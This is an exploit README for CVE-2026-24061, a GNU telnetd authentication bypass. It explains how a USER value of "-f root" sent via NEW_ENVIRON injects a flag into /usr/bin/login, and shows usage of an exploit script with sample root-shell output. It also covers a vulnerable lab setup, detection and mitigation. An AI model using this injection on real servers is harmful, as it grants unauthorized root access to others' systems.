Share
## https://sploitus.com/exploit?id=6071C7FC-18EE-508F-8E57-5928C4D949E0
# CVE-2026-24061: GNU Telnetd Authentication Bypass

## overview

CVE-2026-24061 is a critical authentication bypass vulnerability in GNU telnetd that allows remote attackers to gain root access without credentials.

- CVSS Score: 9.8 (Critical)
- Affected Versions: GNU telnetd up to version 2.7-2
- Discovered By: Kyu Neushwaistein (Carlos Cortes Alvarez) - January 2026
- Impact: Remote Code Execution as root without authentication

## vulnerability details

The vulnerability was introduced in 2015 with the addition of a `%U` placeholder in the login invocation string. This placeholder is replaced with the USER environment variable, which attackers control through the Telnet NEW-ENVIRON option. By setting USER to "-f root", attackers inject the `-f` flag into `/usr/bin/login`, which skips authentication entirely.

## root cause

The vulnerable code path:

1. telnetd.c defines: `LOGIN_INVOCATION "%U%p"`
2. %U expands to `getenv("USER")`
3. Attacker controls USER via Telnet NEW_ENVIRON option
4. Server executes: `/usr/bin/login -f root`
5. The `-f` flag skips authentication, granting root access

## attack flow

```
Client connects โ†’ Server requests NEW_ENVIRON โ†’
Client sends USER="-f root" โ†’ Server runs /usr/bin/login -f root โ†’
Root shell granted
```

## running the exploit

Basic usage:
```bash
python3 main.py 
python3 main.py  -p 2323  # custom port
```

Example:
```bash
python3 main.py 192.168.1.100
# [*] Connected to 192.168.1.100:23
# root@vulnerable:~# whoami
# root
```

## setting up test env

Method 1 - Docker (Recommended):
```bash
cd docker-setup
docker build -t vulnerable-telnetd .
docker run -d -p 2323:23 vulnerable-telnetd
```

Method 2 - Install vulnerable package:
```bash
sudo apt-get install inetutils-telnetd=2:2.0-1ubuntu1
echo "telnet stream tcp nowait root /usr/sbin/telnetd telnetd" | sudo tee -a /etc/inetd.conf
sudo service inetd restart
```

## detection

Network monitoring:
```bash
tcpdump -i any -n 'tcp port 23' -A | grep -i "NEW_ENVIRON"
```

Log analysis:
```bash
grep "/usr/bin/login -f" /var/log/auth.log
grep "session opened for user root" /var/log/auth.log
```

## mitigation

Immediate actions:

1. Update GNU telnetd:
```bash
sudo apt-get update && sudo apt-get install inetutils-telnetd
```

2. Disable Telnet:
```bash
sudo systemctl stop telnetd
sudo systemctl disable telnetd
```

3. Replace with SSH:
```bash
sudo apt-get install openssh-server
```

Long-term: Eliminate Telnet usage, migrate to SSH, implement network segmentation, and block port 23.

## LEGAL DISCLAIMER

This material is for educational and authorized security testing only. Only test systems you own or have explicit written permission to test. Unauthorized access is illegal.

## References

- CVE Entry: https://vulners.com/cve/CVE-2026-24061
- Telnet Protocol (RFC 854): https://tools.ietf.org/html/rfc854
- Telnet Environment Option (RFC 1572): https://tools.ietf.org/html/rfc1572
- SafeBreach Labs Analysis

Last Updated: 2026-03-06